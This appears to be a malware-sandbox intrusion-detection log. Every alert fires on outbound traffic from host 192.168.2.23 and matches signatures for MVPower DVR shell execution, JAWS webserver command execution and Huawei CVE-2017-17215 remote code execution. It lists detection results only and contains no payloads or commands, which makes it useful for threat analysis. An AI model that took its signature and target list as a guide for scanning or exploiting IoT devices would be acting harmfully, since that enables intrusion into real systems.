                                                          192.168.2.2391.215.216.4359224802025883 01/02/24-06:23:50.494104TCP2025883ET EXPLOIT MVPower DVR Shell UCE5922480192.168.2.2391.215.216.43
                                                          192.168.2.23193.46.47.24236186802030092 01/02/24-06:25:30.204860TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3618680192.168.2.23193.46.47.242
                                                          192.168.2.2389.116.58.16258488802025883 01/02/24-06:24:18.153621TCP2025883ET EXPLOIT MVPower DVR Shell UCE5848880192.168.2.2389.116.58.162
                                                          192.168.2.23156.235.102.7249608372152829579 01/02/24-06:25:03.497048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4960837215192.168.2.23156.235.102.72
                                                          192.168.2.23145.236.36.12840926802025883 01/02/24-06:24:59.212800TCP2025883ET EXPLOIT MVPower DVR Shell UCE4092680192.168.2.23145.236.36.128
                                                          192.168.2.2391.194.11.19152908802025883 01/02/24-06:24:17.758398TCP2025883ET EXPLOIT MVPower DVR Shell UCE5290880192.168.2.2391.194.11.191
                                                          192.168.2.2323.77.132.17740724802030092 01/02/24-06:24:18.209402TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4072480192.168.2.2323.77.132.177
                                                          192.168.2.2394.152.11.20858652802025883 01/02/24-06:25:38.297923TCP2025883ET EXPLOIT MVPower DVR Shell UCE5865280192.168.2.2394.152.11.208
                                                          192.168.2.2350.199.186.2553794802025883 01/02/24-06:24:08.558341TCP2025883ET EXPLOIT MVPower DVR Shell UCE5379480192.168.2.2350.199.186.25
                                                          192.168.2.2345.11.236.14242078802025883 01/02/24-06:24:59.115435TCP2025883ET EXPLOIT MVPower DVR Shell UCE4207880192.168.2.2345.11.236.142
                                                          192.168.2.2351.75.21.17840480802025883 01/02/24-06:25:02.016731TCP2025883ET EXPLOIT MVPower DVR Shell UCE4048080192.168.2.2351.75.21.178
                                                          192.168.2.23167.82.120.6646464802030092 01/02/24-06:24:27.487383TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4646480192.168.2.23167.82.120.66
                                                          192.168.2.23129.21.35.14555408802025883 01/02/24-06:24:59.028627TCP2025883ET EXPLOIT MVPower DVR Shell UCE5540880192.168.2.23129.21.35.145
                                                          192.168.2.23160.121.60.20546956802030092 01/02/24-06:23:51.701184TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4695680192.168.2.23160.121.60.205
                                                          192.168.2.23108.186.216.18145040802025883 01/02/24-06:23:51.959819TCP2025883ET EXPLOIT MVPower DVR Shell UCE4504080192.168.2.23108.186.216.181
                                                          192.168.2.2350.87.38.1737480802030092 01/02/24-06:24:23.653878TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3748080192.168.2.2350.87.38.17
                                                          192.168.2.23104.86.91.9035656802025883 01/02/24-06:24:50.099510TCP2025883ET EXPLOIT MVPower DVR Shell UCE3565680192.168.2.23104.86.91.90
                                                          192.168.2.2335.242.176.1443110802025883 01/02/24-06:25:21.012628TCP2025883ET EXPLOIT MVPower DVR Shell UCE4311080192.168.2.2335.242.176.14
                                                          192.168.2.23119.23.86.14936618802025883 01/02/24-06:25:42.547024TCP2025883ET EXPLOIT MVPower DVR Shell UCE3661880192.168.2.23119.23.86.149
                                                          192.168.2.2323.15.103.2141670802025883 01/02/24-06:25:31.414284TCP2025883ET EXPLOIT MVPower DVR Shell UCE4167080192.168.2.2323.15.103.21
                                                          192.168.2.2323.231.34.9059060802030092 01/02/24-06:24:27.279281TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5906080192.168.2.2323.231.34.90
                                                          192.168.2.2320.65.30.21242196802025883 01/02/24-06:25:03.828276TCP2025883ET EXPLOIT MVPower DVR Shell UCE4219680192.168.2.2320.65.30.212
                                                          192.168.2.23184.29.129.740722802030092 01/02/24-06:23:49.999892TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4072280192.168.2.23184.29.129.7
                                                          192.168.2.2385.215.117.2442578802030092 01/02/24-06:24:01.338021TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4257880192.168.2.2385.215.117.24
                                                          192.168.2.2389.212.109.24042828802030092 01/02/24-06:24:42.987046TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4282880192.168.2.2389.212.109.240
                                                          192.168.2.2338.181.35.21934232802030092 01/02/24-06:23:57.729740TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3423280192.168.2.2338.181.35.219
                                                          192.168.2.2338.55.6.5853198802025883 01/02/24-06:25:09.906087TCP2025883ET EXPLOIT MVPower DVR Shell UCE5319880192.168.2.2338.55.6.58
                                                          192.168.2.2357.180.62.6834572802030092 01/02/24-06:24:44.984670TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3457280192.168.2.2357.180.62.68
                                                          192.168.2.235.212.32.240614802030092 01/02/24-06:24:03.060009TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4061480192.168.2.235.212.32.2
                                                          192.168.2.23195.210.122.20639926802025883 01/02/24-06:25:42.425489TCP2025883ET EXPLOIT MVPower DVR Shell UCE3992680192.168.2.23195.210.122.206
                                                          192.168.2.23107.167.54.15750366802030092 01/02/24-06:25:31.230783TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5036680192.168.2.23107.167.54.157
                                                          192.168.2.2354.150.52.14052998802025883 01/02/24-06:24:24.012270TCP2025883ET EXPLOIT MVPower DVR Shell UCE5299880192.168.2.2354.150.52.140
                                                          192.168.2.23152.200.138.8146794802025883 01/02/24-06:24:51.767454TCP2025883ET EXPLOIT MVPower DVR Shell UCE4679480192.168.2.23152.200.138.81
                                                          192.168.2.2323.194.49.1647606802030092 01/02/24-06:24:41.187072TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4760680192.168.2.2323.194.49.16
                                                          192.168.2.2399.79.174.3141104802030092 01/02/24-06:25:34.689900TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4110480192.168.2.2399.79.174.31
                                                          192.168.2.2344.237.242.20252038802030092 01/02/24-06:24:36.865314TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5203880192.168.2.2344.237.242.202
                                                          192.168.2.23202.75.28.17559818802025883 01/02/24-06:24:09.284359TCP2025883ET EXPLOIT MVPower DVR Shell UCE5981880192.168.2.23202.75.28.175
                                                          192.168.2.2318.182.204.24235596802025883 01/02/24-06:25:43.130381TCP2025883ET EXPLOIT MVPower DVR Shell UCE3559680192.168.2.2318.182.204.242
                                                          192.168.2.23147.161.173.436874802030092 01/02/24-06:24:27.401967TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3687480192.168.2.23147.161.173.4
                                                          192.168.2.23212.162.84.18753220802030092 01/02/24-06:24:59.055810TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5322080192.168.2.23212.162.84.187
                                                          192.168.2.23173.61.119.7736382802025883 01/02/24-06:23:51.529010TCP2025883ET EXPLOIT MVPower DVR Shell UCE3638280192.168.2.23173.61.119.77
                                                          192.168.2.23104.25.41.24933472802030092 01/02/24-06:24:01.079195TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3347280192.168.2.23104.25.41.249
                                                          192.168.2.23104.107.146.11748156802030092 01/02/24-06:24:01.091302TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4815680192.168.2.23104.107.146.117
                                                          192.168.2.2357.180.216.7335048802030092 01/02/24-06:25:30.173193TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3504880192.168.2.2357.180.216.73
                                                          192.168.2.2351.17.132.4749620802025883 01/02/24-06:24:34.942338TCP2025883ET EXPLOIT MVPower DVR Shell UCE4962080192.168.2.2351.17.132.47
                                                          192.168.2.2323.198.222.19256304802025883 01/02/24-06:24:18.028834TCP2025883ET EXPLOIT MVPower DVR Shell UCE5630480192.168.2.2323.198.222.192
                                                          192.168.2.23134.0.11.20345208802030092 01/02/24-06:24:03.999636TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4520880192.168.2.23134.0.11.203
                                                          192.168.2.23172.121.35.8032926802030092 01/02/24-06:23:50.004340TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3292680192.168.2.23172.121.35.80
                                                          192.168.2.2377.129.5.23550818802025883 01/02/24-06:25:29.681948TCP2025883ET EXPLOIT MVPower DVR Shell UCE5081880192.168.2.2377.129.5.235
                                                          192.168.2.2320.44.122.13056304802025883 01/02/24-06:24:35.077411TCP2025883ET EXPLOIT MVPower DVR Shell UCE5630480192.168.2.2320.44.122.130
                                                          192.168.2.23188.166.210.13957904802030092 01/02/24-06:25:21.187951TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5790480192.168.2.23188.166.210.139
                                                          192.168.2.2323.37.171.10453882802025883 01/02/24-06:24:30.942227TCP2025883ET EXPLOIT MVPower DVR Shell UCE5388280192.168.2.2323.37.171.104
                                                          192.168.2.23117.52.81.22652076802030092 01/02/24-06:25:30.193653TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5207680192.168.2.23117.52.81.226
                                                          192.168.2.2320.47.19.11445826802030092 01/02/24-06:23:56.133253TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4582680192.168.2.2320.47.19.114
                                                          192.168.2.2335.244.163.22154766802030092 01/02/24-06:23:58.944015TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5476680192.168.2.2335.244.163.221
                                                          192.168.2.2343.175.236.10258804802025883 01/02/24-06:25:44.028517TCP2025883ET EXPLOIT MVPower DVR Shell UCE5880480192.168.2.2343.175.236.102
                                                          192.168.2.2323.214.139.1748916802030092 01/02/24-06:24:08.852245TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4891680192.168.2.2323.214.139.17
                                                          192.168.2.2395.101.194.5540702802030092 01/02/24-06:25:10.079630TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4070280192.168.2.2395.101.194.55
                                                          192.168.2.2318.155.199.10545054802025883 01/02/24-06:23:54.818570TCP2025883ET EXPLOIT MVPower DVR Shell UCE4505480192.168.2.2318.155.199.105
                                                          192.168.2.23104.83.91.4142372802025883 01/02/24-06:24:06.101527TCP2025883ET EXPLOIT MVPower DVR Shell UCE4237280192.168.2.23104.83.91.41
                                                          192.168.2.2359.151.128.1748314802025883 01/02/24-06:24:46.386584TCP2025883ET EXPLOIT MVPower DVR Shell UCE4831480192.168.2.2359.151.128.17
                                                          192.168.2.2374.39.214.2346062802025883 01/02/24-06:25:15.627181TCP2025883ET EXPLOIT MVPower DVR Shell UCE4606280192.168.2.2374.39.214.23
                                                          192.168.2.2323.12.99.17136038802025883 01/02/24-06:24:09.103574TCP2025883ET EXPLOIT MVPower DVR Shell UCE3603880192.168.2.2323.12.99.171
                                                          192.168.2.2391.185.13.23641066802030092 01/02/24-06:24:40.775189TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4106680192.168.2.2391.185.13.236
                                                          192.168.2.23186.39.8.7359120802030092 01/02/24-06:25:19.095834TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5912080192.168.2.23186.39.8.73
                                                          192.168.2.2390.186.147.7442050802030092 01/02/24-06:24:54.920917TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4205080192.168.2.2390.186.147.74
                                                          192.168.2.23178.128.227.10941330802030092 01/02/24-06:25:25.911068TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4133080192.168.2.23178.128.227.109
                                                          192.168.2.23206.238.103.10546650802025883 01/02/24-06:24:08.700707TCP2025883ET EXPLOIT MVPower DVR Shell UCE4665080192.168.2.23206.238.103.105
                                                          192.168.2.2343.225.210.1847310802030092 01/02/24-06:24:55.583858TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4731080192.168.2.2343.225.210.18
                                                          192.168.2.2386.107.30.11541714802030092 01/02/24-06:25:35.089932TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4171480192.168.2.2386.107.30.115
                                                          192.168.2.23104.80.89.1760656802030092 01/02/24-06:25:31.932213TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6065680192.168.2.23104.80.89.17
                                                          192.168.2.231.214.84.941418802025883 01/02/24-06:25:32.217582TCP2025883ET EXPLOIT MVPower DVR Shell UCE4141880192.168.2.231.214.84.9
                                                          192.168.2.23162.243.164.3647712802025883 01/02/24-06:25:00.919883TCP2025883ET EXPLOIT MVPower DVR Shell UCE4771280192.168.2.23162.243.164.36
                                                          192.168.2.23144.126.206.15750982802025883 01/02/24-06:24:28.177953TCP2025883ET EXPLOIT MVPower DVR Shell UCE5098280192.168.2.23144.126.206.157
                                                          192.168.2.2367.207.70.10055198802025883 01/02/24-06:23:52.032969TCP2025883ET EXPLOIT MVPower DVR Shell UCE5519880192.168.2.2367.207.70.100
                                                          192.168.2.2352.66.124.19643216802025883 01/02/24-06:24:31.144023TCP2025883ET EXPLOIT MVPower DVR Shell UCE4321680192.168.2.2352.66.124.196
                                                          192.168.2.23150.60.155.8060130802030092 01/02/24-06:24:13.765423TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6013080192.168.2.23150.60.155.80
                                                          192.168.2.23175.27.12.21960064802030092 01/02/24-06:25:32.237664TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6006480192.168.2.23175.27.12.219
                                                          192.168.2.23216.137.174.13447390802025883 01/02/24-06:25:22.016894TCP2025883ET EXPLOIT MVPower DVR Shell UCE4739080192.168.2.23216.137.174.134
                                                          192.168.2.23104.81.147.8654666802025883 01/02/24-06:23:51.956424TCP2025883ET EXPLOIT MVPower DVR Shell UCE5466680192.168.2.23104.81.147.86
                                                          192.168.2.23213.235.69.15352566802025883 01/02/24-06:25:15.717215TCP2025883ET EXPLOIT MVPower DVR Shell UCE5256680192.168.2.23213.235.69.153
                                                          192.168.2.238.217.69.18058726802025883 01/02/24-06:24:01.420268TCP2025883ET EXPLOIT MVPower DVR Shell UCE5872680192.168.2.238.217.69.180
                                                          192.168.2.23104.252.147.12855178802030092 01/02/24-06:25:35.867202TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5517880192.168.2.23104.252.147.128
                                                          192.168.2.23212.40.8.18758620802030092 01/02/24-06:24:23.995468TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5862080192.168.2.23212.40.8.187
                                                          192.168.2.23205.186.128.848982802030092 01/02/24-06:24:27.336199TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4898280192.168.2.23205.186.128.8
                                                          192.168.2.2338.181.35.21934120802025883 01/02/24-06:23:54.670611TCP2025883ET EXPLOIT MVPower DVR Shell UCE3412080192.168.2.2338.181.35.219
                                                          192.168.2.23173.246.114.1738990802030092 01/02/24-06:24:15.084514TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3899080192.168.2.23173.246.114.17
                                                          192.168.2.2320.244.147.18357646802025883 01/02/24-06:24:58.867978TCP2025883ET EXPLOIT MVPower DVR Shell UCE5764680192.168.2.2320.244.147.183
                                                          192.168.2.2341.47.14.14559648802030092 01/02/24-06:24:55.990421TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5964880192.168.2.2341.47.14.145
                                                          192.168.2.2352.215.63.14354620802030092 01/02/24-06:25:02.012429TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5462080192.168.2.2352.215.63.143
                                                          192.168.2.23104.111.199.19550616802025883 01/02/24-06:24:14.253972TCP2025883ET EXPLOIT MVPower DVR Shell UCE5061680192.168.2.23104.111.199.195
                                                          192.168.2.23170.61.215.22438188802030092 01/02/24-06:24:23.937077TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3818880192.168.2.23170.61.215.224
                                                          192.168.2.23150.60.155.8060130802025883 01/02/24-06:24:13.765423TCP2025883ET EXPLOIT MVPower DVR Shell UCE6013080192.168.2.23150.60.155.80
                                                          192.168.2.2318.142.2.15938786802030092 01/02/24-06:24:24.307205TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3878680192.168.2.2318.142.2.159
                                                          192.168.2.23104.100.195.10552802802025883 01/02/24-06:25:15.214192TCP2025883ET EXPLOIT MVPower DVR Shell UCE5280280192.168.2.23104.100.195.105
                                                          192.168.2.2313.250.225.1660966802025883 01/02/24-06:24:43.065656TCP2025883ET EXPLOIT MVPower DVR Shell UCE6096680192.168.2.2313.250.225.16
                                                          192.168.2.23213.235.69.15352566802030092 01/02/24-06:25:15.717215TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5256680192.168.2.23213.235.69.153
                                                          192.168.2.2313.55.87.22949346802025883 01/02/24-06:24:15.126337TCP2025883ET EXPLOIT MVPower DVR Shell UCE4934680192.168.2.2313.55.87.229
                                                          192.168.2.23190.77.152.21653296802030092 01/02/24-06:25:16.037354TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5329680192.168.2.23190.77.152.216
                                                          192.168.2.232.182.153.6248988802030092 01/02/24-06:24:24.372962TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4898880192.168.2.232.182.153.62
                                                          192.168.2.2362.24.144.16546790802025883 01/02/24-06:25:42.725214TCP2025883ET EXPLOIT MVPower DVR Shell UCE4679080192.168.2.2362.24.144.165
                                                          192.168.2.235.63.152.5938096802030092 01/02/24-06:24:37.257342TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3809680192.168.2.235.63.152.59
                                                          192.168.2.23122.219.208.9451858802030092 01/02/24-06:25:29.715016TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5185880192.168.2.23122.219.208.94
                                                          192.168.2.23209.51.136.5541670802030092 01/02/24-06:25:42.872171TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4167080192.168.2.23209.51.136.55
                                                          192.168.2.23216.137.174.13447390802030092 01/02/24-06:25:22.016894TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4739080192.168.2.23216.137.174.134
                                                          192.168.2.2318.161.154.7646938802025883 01/02/24-06:24:40.755405TCP2025883ET EXPLOIT MVPower DVR Shell UCE4693880192.168.2.2318.161.154.76
                                                          192.168.2.23138.118.173.13258566802025883 01/02/24-06:24:33.144309TCP2025883ET EXPLOIT MVPower DVR Shell UCE5856680192.168.2.23138.118.173.132
                                                          192.168.2.235.133.222.13648094802025883 01/02/24-06:23:51.610663TCP2025883ET EXPLOIT MVPower DVR Shell UCE4809480192.168.2.235.133.222.136
                                                          192.168.2.23194.29.100.3746672802025883 01/02/24-06:24:49.045138TCP2025883ET EXPLOIT MVPower DVR Shell UCE4667280192.168.2.23194.29.100.37
                                                          192.168.2.23168.93.163.14643476802025883 01/02/24-06:24:30.901528TCP2025883ET EXPLOIT MVPower DVR Shell UCE4347680192.168.2.23168.93.163.146
                                                          192.168.2.23156.254.103.5538508372152835222 01/02/24-06:24:27.790071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3850837215192.168.2.23156.254.103.55
                                                          192.168.2.23220.134.75.18260554802025883 01/02/24-06:25:32.202180TCP2025883ET EXPLOIT MVPower DVR Shell UCE6055480192.168.2.23220.134.75.182
                                                          192.168.2.23154.223.106.9147644802030092 01/02/24-06:24:04.156293TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4764480192.168.2.23154.223.106.91
                                                          192.168.2.23193.233.164.23748736802025883 01/02/24-06:24:17.936241TCP2025883ET EXPLOIT MVPower DVR Shell UCE4873680192.168.2.23193.233.164.237
                                                          192.168.2.2387.249.21.23144962802030092 01/02/24-06:23:59.225841TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4496280192.168.2.2387.249.21.231
                                                          192.168.2.2352.216.42.2137628802025883 01/02/24-06:25:15.620032TCP2025883ET EXPLOIT MVPower DVR Shell UCE3762880192.168.2.2352.216.42.21
                                                          192.168.2.2323.3.57.12446500802030092 01/02/24-06:25:22.066559TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4650080192.168.2.2323.3.57.124
                                                          192.168.2.2318.167.130.6444126802030092 01/02/24-06:24:24.131709TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4412680192.168.2.2318.167.130.64
                                                          192.168.2.235.217.213.3240972802030092 01/02/24-06:25:14.761574TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4097280192.168.2.235.217.213.32
                                                          192.168.2.23106.14.41.17435930802025883 01/02/24-06:24:18.753229TCP2025883ET EXPLOIT MVPower DVR Shell UCE3593080192.168.2.23106.14.41.174
                                                          192.168.2.2354.219.136.3735172802030092 01/02/24-06:25:18.698984TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3517280192.168.2.2354.219.136.37
                                                          192.168.2.23172.121.20.14551014802025883 01/02/24-06:24:24.984846TCP2025883ET EXPLOIT MVPower DVR Shell UCE5101480192.168.2.23172.121.20.145
                                                          192.168.2.2323.231.150.12851852802030092 01/02/24-06:24:24.125011TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5185280192.168.2.2323.231.150.128
                                                          192.168.2.23217.23.144.15954616802025883 01/02/24-06:25:02.033209TCP2025883ET EXPLOIT MVPower DVR Shell UCE5461680192.168.2.23217.23.144.159
                                                          192.168.2.23143.208.250.1143668802030092 01/02/24-06:25:10.207227TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4366880192.168.2.23143.208.250.11
                                                          192.168.2.2313.236.88.18038176802030092 01/02/24-06:25:14.749773TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3817680192.168.2.2313.236.88.180
                                                          192.168.2.2387.123.31.16541088802030092 01/02/24-06:24:24.186617TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4108880192.168.2.2387.123.31.165
                                                          192.168.2.2323.205.246.4848598802025883 01/02/24-06:24:55.255106TCP2025883ET EXPLOIT MVPower DVR Shell UCE4859880192.168.2.2323.205.246.48
                                                          192.168.2.23173.61.119.7736382802030092 01/02/24-06:23:51.529010TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3638280192.168.2.23173.61.119.77
                                                          192.168.2.23201.229.167.15941366802025883 01/02/24-06:24:19.178132TCP2025883ET EXPLOIT MVPower DVR Shell UCE4136680192.168.2.23201.229.167.159
                                                          192.168.2.2391.242.215.20436660802025883 01/02/24-06:24:18.756077TCP2025883ET EXPLOIT MVPower DVR Shell UCE3666080192.168.2.2391.242.215.204
                                                          192.168.2.2334.224.189.17652658802025883 01/02/24-06:25:00.915017TCP2025883ET EXPLOIT MVPower DVR Shell UCE5265880192.168.2.2334.224.189.176
                                                          192.168.2.2349.233.248.20255454802025883 01/02/24-06:25:29.740902TCP2025883ET EXPLOIT MVPower DVR Shell UCE5545480192.168.2.2349.233.248.202
                                                          192.168.2.23104.91.11.15157840802030092 01/02/24-06:23:57.977771TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5784080192.168.2.23104.91.11.151
                                                          192.168.2.2362.138.75.22955822802030092 01/02/24-06:25:35.265496TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5582280192.168.2.2362.138.75.229
                                                          192.168.2.23185.2.14.1251600802030092 01/02/24-06:24:35.360260TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5160080192.168.2.23185.2.14.12
                                                          192.168.2.2334.107.164.6038972802025883 01/02/24-06:24:27.400912TCP2025883ET EXPLOIT MVPower DVR Shell UCE3897280192.168.2.2334.107.164.60
                                                          192.168.2.2380.15.65.10050756802025883 01/02/24-06:24:55.923121TCP2025883ET EXPLOIT MVPower DVR Shell UCE5075680192.168.2.2380.15.65.100
                                                          192.168.2.23195.62.126.5460000802025883 01/02/24-06:24:11.155988TCP2025883ET EXPLOIT MVPower DVR Shell UCE6000080192.168.2.23195.62.126.54
                                                          192.168.2.2320.70.223.6440344802030092 01/02/24-06:24:31.051081TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4034480192.168.2.2320.70.223.64
                                                          192.168.2.2341.0.84.3441028372152829579 01/02/24-06:24:06.080918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4102837215192.168.2.2341.0.84.34
                                                          192.168.2.2318.214.78.16148682802025883 01/02/24-06:24:56.009741TCP2025883ET EXPLOIT MVPower DVR Shell UCE4868280192.168.2.2318.214.78.161
                                                          192.168.2.23218.35.171.23047210802030092 01/02/24-06:24:23.810086TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4721080192.168.2.23218.35.171.230
                                                          192.168.2.2335.160.3.14954360802030092 01/02/24-06:24:40.650599TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5436080192.168.2.2335.160.3.149
                                                          192.168.2.2345.32.70.4540790802025883 01/02/24-06:24:45.911026TCP2025883ET EXPLOIT MVPower DVR Shell UCE4079080192.168.2.2345.32.70.45
                                                          192.168.2.2324.236.125.8436362802030092 01/02/24-06:23:50.012962TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3636280192.168.2.2324.236.125.84
                                                          192.168.2.2335.211.213.10757532802025883 01/02/24-06:25:37.947175TCP2025883ET EXPLOIT MVPower DVR Shell UCE5753280192.168.2.2335.211.213.107
                                                          192.168.2.2374.217.134.1157808802025883 01/02/24-06:25:44.030944TCP2025883ET EXPLOIT MVPower DVR Shell UCE5780880192.168.2.2374.217.134.11
                                                          192.168.2.2313.250.65.9258572802030092 01/02/24-06:25:21.541317TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5857280192.168.2.2313.250.65.92
                                                          192.168.2.2362.254.208.1058096802030092 01/02/24-06:24:13.764312TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5809680192.168.2.2362.254.208.10
                                                          192.168.2.2352.222.57.8340002802025883 01/02/24-06:24:17.613377TCP2025883ET EXPLOIT MVPower DVR Shell UCE4000280192.168.2.2352.222.57.83
                                                          192.168.2.23198.44.248.10442602802030092 01/02/24-06:24:27.798165TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4260280192.168.2.23198.44.248.104
                                                          192.168.2.2347.90.200.13459390802030092 01/02/24-06:24:08.717627TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5939080192.168.2.2347.90.200.134
                                                          192.168.2.23170.130.22.25444286802025883 01/02/24-06:24:08.505355TCP2025883ET EXPLOIT MVPower DVR Shell UCE4428680192.168.2.23170.130.22.254
                                                          192.168.2.23106.15.76.4851782802025883 01/02/24-06:24:31.040036TCP2025883ET EXPLOIT MVPower DVR Shell UCE5178280192.168.2.23106.15.76.48
                                                          192.168.2.2318.67.255.7133036802030092 01/02/24-06:24:42.963614TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3303680192.168.2.2318.67.255.71
                                                          192.168.2.23156.241.14.15348512372152829579 01/02/24-06:23:49.692230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4851237215192.168.2.23156.241.14.153
                                                          192.168.2.2350.228.64.4932936802030092 01/02/24-06:25:04.956264TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3293680192.168.2.2350.228.64.49
                                                          192.168.2.23130.211.15.9540968802030092 01/02/24-06:23:49.492483TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4096880192.168.2.23130.211.15.95
                                                          192.168.2.232.135.71.17637678802030092 01/02/24-06:24:11.112670TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3767880192.168.2.232.135.71.176
                                                          192.168.2.2352.188.170.14760094802030092 01/02/24-06:24:56.015920TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6009480192.168.2.2352.188.170.147
                                                          192.168.2.2352.85.133.3147266802030092 01/02/24-06:24:51.888604TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4726680192.168.2.2352.85.133.31
                                                          192.168.2.23154.218.175.19054758802030092 01/02/24-06:25:06.948021TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5475880192.168.2.23154.218.175.190
                                                          192.168.2.2384.247.28.15551342802025883 01/02/24-06:24:08.653606TCP2025883ET EXPLOIT MVPower DVR Shell UCE5134280192.168.2.2384.247.28.155
                                                          192.168.2.2362.210.48.11336542802025883 01/02/24-06:25:31.316043TCP2025883ET EXPLOIT MVPower DVR Shell UCE3654280192.168.2.2362.210.48.113
                                                          192.168.2.2323.216.114.4945924802025883 01/02/24-06:25:10.067215TCP2025883ET EXPLOIT MVPower DVR Shell UCE4592480192.168.2.2323.216.114.49
                                                          192.168.2.2368.68.1.22036644802025883 01/02/24-06:25:00.920491TCP2025883ET EXPLOIT MVPower DVR Shell UCE3664480192.168.2.2368.68.1.220
                                                          192.168.2.2345.169.136.260250802030092 01/02/24-06:24:37.969433TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6025080192.168.2.2345.169.136.2
                                                          192.168.2.2343.225.210.1847296802025883 01/02/24-06:24:55.316812TCP2025883ET EXPLOIT MVPower DVR Shell UCE4729680192.168.2.2343.225.210.18
                                                          192.168.2.23185.114.245.25152468802030092 01/02/24-06:25:19.107884TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5246880192.168.2.23185.114.245.251
